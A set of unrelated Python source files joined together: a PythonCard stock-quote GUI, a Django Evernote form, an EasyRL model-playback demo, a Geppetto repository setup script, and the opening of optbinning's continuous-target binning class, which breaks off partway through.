def get_vol(symbol):
global vol
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?vo".*?>(.*?)<', content)
if m:
vol = m.group(1)
else:
vol = 'N/A'
return vol
def get_mc(symbol):
global mc
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?mc".*?>(.*?)<', content)
if m:
mc = m.group(1)
else:
mc = 'N/A'
return mc
def get_lo52(symbol):
global lo52
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?lo52".*?>(.*?)<', content)
if m:
lo52 = m.group(1)
else:
lo52 = 'N/A'
return lo52
def get_pe(symbol):
global pe
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?lo52".*?>(.*?)<', content)
if m:
pe = m.group(1)
else:
pe = 'N/A'
return pe
def get_beta(symbol):
global beta
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?beta".*?>(.*?)<', content)
if m:
beta = m.group(1)
else:
beta = 'N/A'
return beta
def get_div(symbol):
global div
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?div".*?>(.*?)<', content)
if m:
div = m.group(1)
else:
div = 'N/A'
return div
def get_yield(symbol):
global yield1
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?yield".*?>(.*?)<', content)
if m:
yield1 = m.group(1)
else:
yield1 = N/A
return yield1
def get_shares(symbol):
global shares
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?shares".*?>(.*?)<', content)
if m:
shares = m.group(1)
else:
shares = N/A
return shares
def get_own(symbol):
global own
base_url = 'http://finance.google.com/finance?q='
content = urllib.urlopen(base_url + symbol).read()
m = re.search('".*?own".*?>(.*?)<', content)
if m:
own = m.group(1)
else:
own = N/A
return own
class stock(model.Background):
def on_getQuote_mouseClick(self, event):
global symbol
symbol = self.components.quotese.text
class Repeater(Thread):
def __init__(self,interval,fun,*args,**kw):
Thread.__init__(self)
self.interval=interval
self.fun=fun
self.args=args
self.kw=kw
self.keep_going=True
def run(self):
while(self.keep_going):
sleep(self.interval)
self.fun(*self.args,**self.kw)
def Refresh(*a):
get_quote(symbol)
get_change(symbol)
self.components.current.text = quote
self.components.change.text = change
r=Repeater(1.0, Refresh)
r.start()
def on_stockinfo_mouseClick(self, event):
global symbol
symbol = self.components.quotese.text
get_open(symbol)
get_high(symbol)
get_high52(symbol)
get_low(symbol)
get_vol(symbol)
get_mc(symbol)
get_lo52(symbol)
get_pe(symbol)
get_beta(symbol)
get_div(symbol)
get_yield(symbol)
get_shares(symbol)
get_own(symbol)
self.components.inst.text = own
self.components.shares.text = shares
self.components.yield1.text = yield1
self.components.div.text = div
self.components.beta.text = beta
self.components.pe.text = pe
self.components.lo52.text = lo52
self.components.mkt.text = mc
self.components.vol.text = vol
self.components.opens.text = opens
self.components.high.text = high
self.components.hi52.text = high52
self.components.low.text = low
def on_save_mouseClick(self, event):
stock1 = open('stock1.txt', 'w')
stock1.write(self.components.stock1.text)
stock1.close()
stock2 = open('stock2.txt', 'w')
stock2.write(self.components.stock2.text)
stock2.close()
stock3 = open('stock3.txt', 'w')
stock3.write(self.components.stock3.text)
stock3.close()
stock4 = open('stock4.txt', 'w')
stock4.write(self.components.stock4.text)
stock4.close()
def on_load_mouseClick(self, event):
load1 = open('stock1.txt' , 'r').read()
self.components.stock1.text = load1
load2 = open('stock2.txt' , 'r').read()
self.components.stock2.text = load2
load3 = open('stock3.txt' , 'r').read()
self.components.stock3.text = load3
load4 = open('stock4.txt' , 'r').read()
self.components.stock4.text = load4
def on_update_mouseClick(self, event):
symbol = self.components.stock1.text
get_quote(symbol)
self.components.change1.text = quote
symbol = self.components.stock2.text
get_quote(symbol)
self.components.change2.text = quote
symbol = self.components.stock3.text
get_quote(symbol)
self.components.change3.text = quote
symbol = self.components.stock4.text
get_quote(symbol)
self.components.change4.text = quote
def on_clear_mouseClick(self, event):
self.components.stock1.text = ""
self.components.stock2.text = ""
self.components.stock3.text = ""
self.components.stock4.text = ""
self.components.change1.text = ""
self.components.change2.text = ""
self.components.change3.text = ""
self.components.change4.text = ""
if __name__ == '__main__':
app = model.Application(stock)
app.MainLoop()
_______________________________________________________________________________
save following as stock.rsrc.py
{'application':{'type':'Application',
'name':'Template',
'backgrounds': [
{'type':'Background',
'name':'bgTemplate',
'title':'Standard Template with File->Exit menu',
'size':(711, 634),
'style':['resizeable'],
'menubar': {'type':'MenuBar',
'menus': [
{'type':'Menu',
'name':'menuFile',
'label':'&File',
'items': [
{'type':'MenuItem',
'name':'save',
'label':u'Save',
},
{'type':'MenuItem',
'name':'menuFileExit',
'label':'E&xit',
'command':'exit',
},
]
},
]
},
'components': [
{'type':'Button',
'name':'clear',
'position':(333, 555),
'label':u'Clear',
},
{'type':'Button',
'name':'save',
'position':(523, 444),
'size':(117, -1),
'label':u'Save',
},
{'type':'StaticText',
'name':'statictext10',
'position':(40, 510),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Update to show price',
},
{'type':'Button',
'name':'load',
'position':(523, 420),
'size':(117, -1),
'label':u'Load',
},
{'type':'StaticText',
'name':'StaticText5',
'position':(26, 488),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Or load to load previous',
},
{'type':'Button',
'name':'update',
'position':(522, 470),
'size':(120, 80),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 11},
'label':u'Update',
},
{'type':'StaticText',
'name':'StaticText4',
'position':(31, 465),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Then click save to save',
},
{'type':'StaticText',
'name':'StaticText3',
'position':(10, 445),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 12},
'foregroundColor':(0, 0, 160, 255),
'text':u'Enter name of stocks to monitor',
},
{'type':'StaticBox',
'name':'StaticBox1',
'position':(343, 109),
'size':(349, 242),
},
{'type':'StaticLine',
'name':'StaticLine1',
'position':(2, 400),
'size':(697, -1),
'layout':'horizontal',
},
{'type':'StaticText',
'name':'StaticText2',
'position':(395, 414),
'text':u'Current Price',
},
{'type':'StaticText',
'name':'StaticText1',
'position':(268, 414),
'text':u'Name Of Stock',
},
{'type':'TextField',
'name':'change4',
'position':(378, 530),
'editable':False,
},
{'type':'TextField',
'name':'stock4',
'position':(258, 530),
},
{'type':'TextField',
'name':'change3',
'position':(378, 500),
'editable':False,
},
{'type':'TextField',
'name':'stock3',
'position':(258, 500),
},
{'type':'TextField',
'name':'change2',
'position':(378, 471),
'editable':False,
},
{'type':'TextField',
'name':'stock2',
'position':(258, 470),
},
{'type':'TextField',
'name':'change1',
'position':(378, 440),
'editable':False,
},
{'type':'TextField',
'name':'stock1',
'position':(258, 440),
},
{'type':'Button',
'name':'stockinfo',
'position':(170, 92),
'label':u'Get Info',
},
{'type':'HtmlWindow',
'name':'HtmlWindow1',
'position':(348, 120),
'size':(339, 225),
'backgroundColor':(255, 255, 255, 255),
'text':u'tickers.html',
},
{'type':'StaticText',
'name':'stockCheckversion',
'position':(213, 0),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 36},
'foregroundColor':(255, 128, 0, 255),
'text':u'Stock Check V2.0',
},
{'type':'StaticText',
'name':'Changelbl',
'position':(14, 84),
'foregroundColor':(128, 0, 0, 255),
'text':u'Change',
},
{'type':'TextField',
'name':'change',
'position':(53, 74),
'size':(-1, 21),
'border':'none',
'editable':False,
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 10},
'foregroundColor':(128, 0, 0, 255),
},
{'type':'TextField',
'name':'current',
'position':(12, 33),
'size':(194, 33),
'border':'none',
'editable':False,
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 24},
'foregroundColor':(0, 128, 0, 255),
},
{'type':'StaticText',
'name':'Currentlbl',
'position':(81, 10),
'font':{'faceName': u'Tahoma', 'family': 'sansSerif', 'size': 18},
'foregroundColor':(0, 128, 0, 255),
'text':u'Current',
},
{'type':'StaticText',
'name':'wkLowlbl',
'position':(8, 364),
'text':u'52Wk Low',
},
{'type':'StaticText',
'name':'instOwnlbl',
'position':(183, 325),
'text':u'Inst. Own',
},
{'type':'StaticText',
'name':'Shareslbl',
'position':(186, 284),
'text':u'Shares',
},
{'type':'StaticText',
'name':'PElbl',
'position':(193, 124),
'text':u'P/E',
},
{'type':'StaticText',
'name':'Openlbl',
'position':(12, 124),
'text':u'Open',
},
{'type':'StaticText',
'name':'Highlbl',
'position':(16, 164),
'text':u'High',
},
{'type':'TextField',
'name':'pe',
'position':(260, 120),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'opens',
'position':(80, 120),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'high',
'position':(80, 160),
'size':(80, -1),
'editable':False,
},
{'type':'TextField',
'name':'inst',
'position':(260, 320),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'shares',
'position':(260, 280),
'size':(81, -1),
'editable':False,
},
{'type':'StaticText',
'name':'Yieldlbl',
'position':(191, 244),
'text':u'Yield',
},
{'type':'StaticText',
'name':'Dividendlbl',
'position':(183, 163),
'text':u'Dividend',
},
{'type':'TextField',
'name':'lo52',
'position':(80, 360),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'yield1',
'position':(260, 240),
'size':(81, -1),
'editable':False,
},
{'type':'TextField',
'name':'div',
'position':(260, 160),
'size':(81, -1),
'editable':False,
},
{'type':'StaticText',
'name':'Betalbl',
'position':(193, 204),
'text':u'Beta',
},
{'type':'TextField',
'name':'beta',
'position':(260, 200),
'size':(81, -1),
'editable':False,
},
{'type':'StaticText',
'name':'wkHighlbl',
'position':(6, 323),
'text':u'52Wk High',
},
{'type':'TextField',
'name':'hi52',
'position':(80, 320),
'size':(80, -1),
'editable':False,
},
{'type':'StaticText',
'name':'mktCaplbl',
'position':(11, 283),
'size':(-1, 16),
'text':u'Mkt Cap',
},
{'type':'TextField',
'name':'mkt',
'position':(80, 280),
'size':(80, -1),
'editable':False,
},
{'type':'StaticText',
'name':'Vollbl',
'position':(19, 244),
'text':u'Vol',
},
{'type':'StaticText',
'name':'Lowlbl',
'position':(16, 204),
'text':u'Low',
},
{'type':'TextField',
'name':'vol',
'position':(80, 240),
'size':(80, -1),
'editable':False,
},
{'type':'TextField',
'name':'low',
'position':(80, 200),
'size':(80, -1),
'editable':False,
},
{'type':'Button',
'name':'getQuote',
'position':(313, 63),
'label':u'Get Quote',
},
{'type':'TextField',
'name':'quotese',
'position':(209, 64),
},
] # end components
} # end background
] # end backgrounds
} }
|
th_evernote/forms.py
|
Leopere/django-th
| 1,069 |
101553
|
<reponame>Leopere/django-th
# coding: utf-8
from django import forms
from django.forms import TextInput
from th_evernote.models import Evernote
class EvernoteForm(forms.ModelForm):
"""
for to handle Evernote service
"""
class Meta:
model = Evernote
fields = ('tag', 'notebook', )
widgets = {
'tag': TextInput(attrs={'class': 'form-control'}),
'notebook': TextInput(attrs={'class': 'form-control'}),
}
class EvernoteConsumerForm(EvernoteForm):
pass
class EvernoteProviderForm(EvernoteForm):
pass
|
demo/play_with_saved_model.py
|
simonoso/EasyRL
| 125 |
101588
|
import gym
import numpy as np
import tensorflow as tf
from tensorflow import saved_model as sm
from easy_rl.utils.window_stat import WindowStat
from easy_rl.utils.gym_wrapper.atari_wrapper import make_atari, wrap_deepmind
import time
def main():
gym_env = gym.make("CartPole-v0")
atari_env = make_atari("PongNoFrameskip-v4")
atari_env = wrap_deepmind(
env=atari_env,
frame_stack=True,
clip_rewards=False,
episode_life=True,
wrap_frame=True,
frame_resize=42)
# replace the following env according to your saved_model
# env = atari_env
env = gym_env
with tf.Session() as sess:
path = 'dump_dir'
MetaGraphDef = tf.saved_model.loader.load(
sess, tags=[sm.tag_constants.SERVING], export_dir=path)
# get SignatureDef protobuf
SignatureDef_d = MetaGraphDef.signature_def
SignatureDef = SignatureDef_d["predict_results"]
# get inputs/outputs TensorInfo protobuf
ph_inputs = {}
for name, ts_info in SignatureDef.inputs.items():
ph_inputs[name] = sm.utils.get_tensor_from_tensor_info(
ts_info, sess.graph)
outputs = {}
for name, ts_info in SignatureDef.outputs.items():
outputs[name] = sm.utils.get_tensor_from_tensor_info(
ts_info, sess.graph)
for name, ph in ph_inputs.items():
print(name, ph)
for name, ts in outputs.items():
print(name, ts)
len_window = WindowStat("length", 50)
reward_window = WindowStat("reward", 50)
for i in range(100):
ob = env.reset()
env.render()
time.sleep(0.2)
done = False
episode_len = 0
episode_reward = .0
while not done:
action = sess.run(
outputs["output_actions"],
feed_dict={
ph_inputs["obs_ph"]: [np.asarray(ob)],
ph_inputs["deterministic_ph"]: True
})
next_ob, reward, done, info = env.step(action[0])
env.render()
time.sleep(0.1)
episode_reward += reward
episode_len += 1
ob = next_ob
len_window.push(episode_len)
reward_window.push(episode_reward)
print(reward_window)
print(len_window)
if __name__ == '__main__':
main()
|
utilities/source_setup/setup.py
|
sanjayankur31/org.geppetto
| 164 |
101595
|
#!/usr/bin/python
#
# Script to clone Geppetto git repositories
# If a target directory is not passed as the
# first argument, the sourcesdir specified in
# config.json is used
# If config.json is used, org.geppetto.core,
# model, frontend and simulation are
# included automatically.
# The user can chose to select the rest of the repos
# or automatically include those listed in config,json
#
import os, sys, subprocess, json
try:
import simplejson
except:
import json as simplejson
from subprocess import call
from xml.dom.minidom import parse, parseString
print(open(os.path.join(os.path.dirname(__file__), 'config.json')).read())
config = json.loads(open(os.path.join(os.path.dirname(__file__), 'config.json')).read())
def writeToPomXML(repo):
#Open pom.xml
basepath = os.path.dirname(__file__)
pompath = os.path.abspath(os.path.join(basepath, "..", "..", "pom.xml"))
#Create minidom parser
pom = parse(pompath)
#Get elements tagged module - we will need to add to these later.
modules = pom.getElementsByTagName("modules").item(0)
all_modules = pom.getElementsByTagName("modules")
module = pom.getElementsByTagName("module")
#Start from the assumption that we need to write the repo to our xml file. Check pom.xml to see if the repo is present.
# If it is not, add a new element in there with the repo name.
write_repo = False
for node in all_modules:
module_list=node.getElementsByTagName('module')
for m in module_list:
if m.childNodes[0].nodeValue == "../"+repo['name']:
write_repo=True
print(m.childNodes[0].nodeValue)
if write_repo == False:
new_module = pom.createElement("module")
new_module.nodeValue="../"+repo['name']
txt=pom.createTextNode("../"+repo['name'])
new_module.appendChild(txt)
modules.appendChild(new_module)
newline = pom.createTextNode('\n')
modules.appendChild(newline)
pom.writexml(open(pompath,"w"),
indent=" ",
addindent=" ",
newl='')
def writeToPlan(repo):
#Open geppetto.plan
basepath = os.path.dirname(__file__)
planpath = os.path.abspath(os.path.join(basepath, "..", "..", "geppetto.plan"))
#Create minidom parser
plan = parse(planpath)
#Get elements tagged plan and artifact.
plan_name = plan.getElementsByTagName("plan").item(0)
artifact_type = plan.getElementsByTagName("artifact")
#Start from the assumption that we need to write the repo to our xml file. Check pom.xml to see if the repo is present.
#If it is not, add a new element in there with the repo name, bundle type and the repo version.
write_artifact=False
artifact_version = artifact_type[0].attributes["version"].value
for x in range(0, len(artifact_type)):
art_ref = artifact_type[x]
if art_ref.attributes["name"].value == repo['name']:
write_artifact=True
if write_artifact == False:
new_artifact = plan.createElement("artifact")
new_artifact.setAttribute("type", "bundle")
new_artifact.setAttribute("name", repo["name"])
new_artifact.setAttribute("version", artifact_version)
plan_name.appendChild(new_artifact)
plan.writexml(open(planpath,"w"),
indent=" ",
addindent=" ",
newl='\n')
def main(argv):
yes = set(['yes','y'])
if argv:
target_dir = argv[0]
else:
target_dir = os.path.abspath(config['sourcesdir'])
if not os.path.isdir(target_dir):
raise IOError("Geppetto sources folder does not exist, create it and set the sourcesdir field in config.json: \"" + target_dir + "\"")
print("Copying Geppetto repositories into", target_dir)
print("Would you like to customise your repositories? [y/n]")
custom_repo = input().lower()
if custom_repo in yes:
for repo in config['repos']:
if repo['auto_install'] == "yes":
print("Geppetto repository cloned by default", repo['url'])
if repo['name'] == 'geppetto-application':
# subprocess.call(['rm', '-rf', 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
subprocess.call(['git', 'clone', repo['url'], 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
else:
subprocess.call(['git', 'clone', repo['url']], cwd = target_dir)
#Once the repos are cloned, write to pom.xml
writeToPomXML(repo)
writeToPlan(repo)
else:
print("Geppetto repository not cloned by default", repo['url'])
print("Would you like to clone this repository? [y/n]")
repository = input().lower()
if repository in yes:
subprocess.call(['git', 'clone', repo['url']], cwd=target_dir)
writeToPomXML(repo)
writeToPlan(repo)
else:
for repo in config['repos']:
if repo['auto_install'] == "yes":
print("Geppetto repository cloned by default", repo['url'])
if repo['name'] == 'geppetto-application':
# subprocess.call(['rm', '-rf', 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
subprocess.call(['git', 'clone', repo['url'], 'webapp'], cwd=os.path.join(target_dir, 'org.geppetto.frontend/src/main'))
else:
subprocess.call(['git', 'clone', repo['url']], cwd = target_dir)
#Once the repos are cloned, write to pom.xml
writeToPomXML(repo)
writeToPlan(repo)
#Then add the new repo into geppetto.plan and pom.xml
print("All Geppetto repositories cloned")
if __name__ == "__main__":
main(sys.argv[1:])
|
optbinning/binning/continuous_binning.py
|
jensgk/optbinning
| 207 |
101599
|
"""
Optimal binning algorithm for continuous target.
"""
# <NAME> <<EMAIL>>
# Copyright (C) 2019
import numbers
import time
from sklearn.utils import check_array
import numpy as np
from ..information import solver_statistics
from ..logging import Logger
from .auto_monotonic import auto_monotonic_continuous
from .auto_monotonic import peak_valley_trend_change_heuristic
from .binning import OptimalBinning
from .binning_statistics import continuous_bin_info
from .binning_statistics import ContinuousBinningTable
from .binning_statistics import target_info_special_continuous
from .continuous_cp import ContinuousBinningCP
from .preprocessing import preprocessing_user_splits_categorical
from .preprocessing import split_data
from .transformations import transform_continuous_target
logger = Logger(__name__).logger
def _check_parameters(name, dtype, prebinning_method, max_n_prebins,
min_prebin_size, min_n_bins, max_n_bins, min_bin_size,
max_bin_size, monotonic_trend, min_mean_diff, max_pvalue,
max_pvalue_policy, outlier_detector, outlier_params,
cat_cutoff, user_splits, user_splits_fixed,
special_codes, split_digits, time_limit, verbose):
if not isinstance(name, str):
raise TypeError("name must be a string.")
if dtype not in ("categorical", "numerical"):
raise ValueError('Invalid value for dtype. Allowed string '
'values are "categorical" and "numerical".')
if prebinning_method not in ("cart", "quantile", "uniform"):
raise ValueError('Invalid value for prebinning_method. Allowed string '
'values are "cart", "quantile" and "uniform".')
if not isinstance(max_n_prebins, numbers.Integral) or max_n_prebins <= 1:
raise ValueError("max_prebins must be an integer greater than 1; "
"got {}.".format(max_n_prebins))
if not 0. < min_prebin_size <= 0.5:
raise ValueError("min_prebin_size must be in (0, 0.5]; got {}."
.format(min_prebin_size))
if min_n_bins is not None:
if not isinstance(min_n_bins, numbers.Integral) or min_n_bins <= 0:
raise ValueError("min_n_bins must be a positive integer; got {}."
.format(min_n_bins))
if max_n_bins is not None:
if not isinstance(max_n_bins, numbers.Integral) or max_n_bins <= 0:
raise ValueError("max_n_bins must be a positive integer; got {}."
.format(max_n_bins))
if min_n_bins is not None and max_n_bins is not None:
if min_n_bins > max_n_bins:
raise ValueError("min_n_bins must be <= max_n_bins; got {} <= {}."
.format(min_n_bins, max_n_bins))
if min_bin_size is not None:
if (not isinstance(min_bin_size, numbers.Number) or
not 0. < min_bin_size <= 0.5):
raise ValueError("min_bin_size must be in (0, 0.5]; got {}."
.format(min_bin_size))
if max_bin_size is not None:
if (not isinstance(max_bin_size, numbers.Number) or
not 0. < max_bin_size <= 1.0):
raise ValueError("max_bin_size must be in (0, 1.0]; got {}."
.format(max_bin_size))
if min_bin_size is not None and max_bin_size is not None:
if min_bin_size > max_bin_size:
raise ValueError("min_bin_size must be <= max_bin_size; "
"got {} <= {}.".format(min_bin_size,
max_bin_size))
if monotonic_trend is not None:
if monotonic_trend not in ("auto", "auto_heuristic", "auto_asc_desc",
"ascending", "descending", "convex",
"concave", "peak", "valley",
"peak_heuristic", "valley_heuristic"):
raise ValueError('Invalid value for monotonic trend. Allowed '
'string values are "auto", "auto_heuristic", '
'"auto_asc_desc", "ascending", "descending", '
'"concave", "convex", "peak", "valley", '
'"peak_heuristic" and "valley_heuristic".')
if (not isinstance(min_mean_diff, numbers.Number) or min_mean_diff < 0):
raise ValueError("min_mean_diff must be >= 0; got {}."
.format(min_mean_diff))
if max_pvalue is not None:
if (not isinstance(max_pvalue, numbers.Number) or
not 0. < max_pvalue <= 1.0):
raise ValueError("max_pvalue must be in (0, 1.0]; got {}."
.format(max_pvalue))
if max_pvalue_policy not in ("all", "consecutive"):
raise ValueError('Invalid value for max_pvalue_policy. Allowed string '
'values are "all" and "consecutive".')
if outlier_detector is not None:
if outlier_detector not in ("range", "zscore"):
raise ValueError('Invalid value for outlier_detector. Allowed '
'string values are "range" and "zscore".')
if outlier_params is not None:
if not isinstance(outlier_params, dict):
raise TypeError("outlier_params must be a dict or None; "
"got {}.".format(outlier_params))
if cat_cutoff is not None:
if (not isinstance(cat_cutoff, numbers.Number) or
not 0. < cat_cutoff <= 1.0):
raise ValueError("cat_cutoff must be in (0, 1.0]; got {}."
.format(cat_cutoff))
if user_splits is not None:
if not isinstance(user_splits, (np.ndarray, list)):
raise TypeError("user_splits must be a list or numpy.ndarray.")
if user_splits_fixed is not None:
if user_splits is None:
raise ValueError("user_splits must be provided.")
else:
if not isinstance(user_splits_fixed, (np.ndarray, list)):
raise TypeError("user_splits_fixed must be a list or "
"numpy.ndarray.")
elif not all(isinstance(s, bool) for s in user_splits_fixed):
raise ValueError("user_splits_fixed must be list of boolean.")
elif len(user_splits) != len(user_splits_fixed):
raise ValueError("Inconsistent length of user_splits and "
"user_splits_fixed: {} != {}. Lengths must "
"be equal".format(len(user_splits),
len(user_splits_fixed)))
if special_codes is not None:
if not isinstance(special_codes, (np.ndarray, list, dict)):
raise TypeError("special_codes must be a dit, list or "
"numpy.ndarray.")
if isinstance(special_codes, dict) and not len(special_codes):
raise ValueError("special_codes empty. special_codes dict must "
"contain at least one special.")
if split_digits is not None:
if (not isinstance(split_digits, numbers.Integral) or
not 0 <= split_digits <= 8):
raise ValueError("split_digist must be an integer in [0, 8]; "
"got {}.".format(split_digits))
if not isinstance(time_limit, numbers.Number) or time_limit < 0:
raise ValueError("time_limit must be a positive value in seconds; "
"got {}.".format(time_limit))
if not isinstance(verbose, bool):
raise TypeError("verbose must be a boolean; got {}.".format(verbose))
class ContinuousOptimalBinning(OptimalBinning):
"""Optimal binning of a numerical or categorical variable with respect to a
continuous target.
Parameters
----------
name : str, optional (default="")
The variable name.
dtype : str, optional (default="numerical")
The variable data type. Supported data types are "numerical" for
continuous and ordinal variables and "categorical" for categorical
and nominal variables.
prebinning_method : str, optional (default="cart")
The pre-binning method. Supported methods are "cart" for a CART
decision tree, "quantile" to generate prebins with approximately same
frequency and "uniform" to generate prebins with equal width. Method
"cart" uses `sklearn.tree.DecisionTreeRegressor
<https://scikit-learn.org/stable/modules/generated/sklearn.tree.
DecisionTreeRegressor.html>`_.
max_n_prebins : int (default=20)
The maximum number of bins after pre-binning (prebins).
min_prebin_size : float (default=0.05)
The fraction of mininum number of records for each prebin.
min_n_bins : int or None, optional (default=None)
The minimum number of bins. If None, then ``min_n_bins`` is
a value in ``[0, max_n_prebins]``.
max_n_bins : int or None, optional (default=None)
The maximum number of bins. If None, then ``max_n_bins`` is
a value in ``[0, max_n_prebins]``.
min_bin_size : float or None, optional (default=None)
The fraction of minimum number of records for each bin. If None,
``min_bin_size = min_prebin_size``.
max_bin_size : float or None, optional (default=None)
The fraction of maximum number of records for each bin. If None,
``max_bin_size = 1.0``.
monotonic_trend : str or None, optional (default="auto")
The **mean** monotonic trend. Supported trends are “auto”,
"auto_heuristic" and "auto_asc_desc" to automatically determine the
trend minimize the L1-norm using a machine learning classifier,
"ascending", "descending", "concave", "convex", "peak" and
"peak_heuristic" to allow a peak change point, and "valley" and
"valley_heuristic" to allow a valley change point. Trends
"auto_heuristic", "peak_heuristic" and "valley_heuristic" use a
heuristic to determine the change point, and are significantly faster
for large size instances (``max_n_prebins> 20``). Trend "auto_asc_desc"
is used to automatically select the best monotonic trend between
"ascending" and "descending". If None, then the monotonic constraint
is disabled.
min_mean_diff : float, optional (default=0)
The minimum mean difference between consecutives bins. This
option currently only applies when ``monotonic_trend`` is "ascending"
or "descending".
max_pvalue : float or None, optional (default=0.05)
The maximum p-value among bins. The T-test is used to detect bins
not satisfying the p-value constraint.
max_pvalue_policy : str, optional (default="consecutive")
The method to determine bins not satisfying the p-value constraint.
Supported methods are "consecutive" to compare consecutive bins and
"all" to compare all bins.
outlier_detector : str or None, optional (default=None)
The outlier detection method. Supported methods are "range" to use
the interquartile range based method or "zcore" to use the modified
Z-score method.
outlier_params : dict or None, optional (default=None)
Dictionary of parameters to pass to the outlier detection method.
cat_cutoff : float or None, optional (default=None)
Generate bin others with categories in which the fraction of
occurrences is below the ``cat_cutoff`` value. This option is
available when ``dtype`` is "categorical".
user_splits : array-like or None, optional (default=None)
The list of pre-binning split points when ``dtype`` is "numerical" or
the list of prebins when ``dtype`` is "categorical".
user_splits_fixed : array-like or None (default=None)
The list of pre-binning split points that must be fixed.
special_codes : array-like, dict or None, optional (default=None)
List of special codes. Use special codes to specify the data values
that must be treated separately.
split_digits : int or None, optional (default=None)
The significant digits of the split points. If ``split_digits`` is set
to 0, the split points are integers. If None, then all significant
digits in the split points are considered.
time_limit : int (default=100)
The maximum time in seconds to run the optimization solver.
verbose : bool (default=False)
Enable verbose output.
**prebinning_kwargs : keyword arguments
The pre-binning keywrord arguments.
.. versionadded:: 0.6.1
Notes
-----
The parameter values ``max_n_prebins`` and ``min_prebin_size`` control
complexity and memory usage. The default values generally produce quality
results, however, some improvement can be achieved by increasing
``max_n_prebins`` and/or decreasing ``min_prebin_size``.
The T-test uses an estimate of the standard deviation of the contingency
table to speed up the model generation and reduce memory usage. Therefore,
it is not guaranteed to obtain bins satisfying the p-value constraint,
although it may work reasonably well in most cases. To avoid having bins
with similar bins the parameter ``min_mean_diff`` is recommended.
"""
def __init__(self, name="", dtype="numerical", prebinning_method="cart",
max_n_prebins=20, min_prebin_size=0.05, min_n_bins=None,
max_n_bins=None, min_bin_size=None, max_bin_size=None,
monotonic_trend="auto", min_mean_diff=0, max_pvalue=None,
max_pvalue_policy="consecutive", outlier_detector=None,
outlier_params=None, cat_cutoff=None, user_splits=None,
user_splits_fixed=None, special_codes=None, split_digits=None,
time_limit=100, verbose=False, **prebinning_kwargs):
self.name = name
self.dtype = dtype
self.prebinning_method = prebinning_method
self.solver = "cp"
self.max_n_prebins = max_n_prebins
self.min_prebin_size = min_prebin_size
self.min_n_bins = min_n_bins
self.max_n_bins = max_n_bins
self.min_bin_size = min_bin_size
self.max_bin_size = max_bin_size
self.monotonic_trend = monotonic_trend
self.min_mean_diff = min_mean_diff
self.max_pvalue = max_pvalue
self.max_pvalue_policy = max_pvalue_policy
self.outlier_detector = outlier_detector
self.outlier_params = outlier_params
self.cat_cutoff = cat_cutoff
self.user_splits = user_splits
self.user_splits_fixed = user_splits_fixed
self.special_codes = special_codes
self.split_digits = split_digits
self.time_limit = time_limit
self.verbose = verbose
self.prebinning_kwargs = prebinning_kwargs
# auxiliary
self._categories = None
self._cat_others = None
self._n_records = None
self._sums = None
self._stds = None
self._min_target = None
self._max_target = None
self._n_zeros = None
self._n_records_cat_others = None
self._n_records_missing = None
self._n_records_special = None
self._sum_cat_others = None
self._sum_special = None
self._sum_missing = None
self._std_cat_others = None
self._std_special = None
self._std_missing = None
self._min_target_missing = None
self._min_target_special = None
self._min_target_others = None
self._max_target_missing = None
self._max_target_special = None
self._max_target_others = None
self._n_zeros_missing = None
self._n_zeros_special = None
self._n_zeros_others = None
self._problem_type = "regression"
# info
self._binning_table = None
self._n_prebins = None
self._n_refinements = 0
self._n_samples = None
self._optimizer = None
self._splits_optimal = None
self._status = None
# timing
self._time_total = None
self._time_preprocessing = None
self._time_prebinning = None
self._time_solver = None
self._time_optimizer = None
self._time_postprocessing = None
self._is_fitted = False
def fit(self, x, y, check_input=False):
"""Fit the optimal binning according to the given training data.
Parameters
----------
x : array-like, shape = (n_samples,)
Training vector, where n_samples is the number of samples.
y : array-like, shape = (n_samples,)
Target vector relative to x.
check_input : bool (default=False)
Whether to check input arrays.
Returns
-------
self : ContinuousOptimalBinning
Fitted optimal binning.
"""
return self._fit(x, y, check_input)
def fit_transform(self, x, y, metric="mean", metric_special=0,
metric_missing=0, show_digits=2, check_input=False):
"""Fit the optimal binning according to the given training data, then
transform it.
Parameters
----------
x : array-like, shape = (n_samples,)
Training vector, where n_samples is the number of samples.
y : array-like, shape = (n_samples,)
Target vector relative to x.
metric : str (default="mean"):
The metric used to transform the input vector. Supported metrics
are "mean" to choose the mean, "indices" to assign the
corresponding indices of the bins and "bins" to assign the
corresponding bin interval.
metric_special : float or str (default=0)
The metric value to transform special codes in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
metric_missing : float or str (default=0)
The metric value to transform missing values in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
show_digits : int, optional (default=2)
The number of significant digits of the bin column. Applies when
``metric="bins"``.
check_input : bool (default=False)
Whether to check input arrays.
Returns
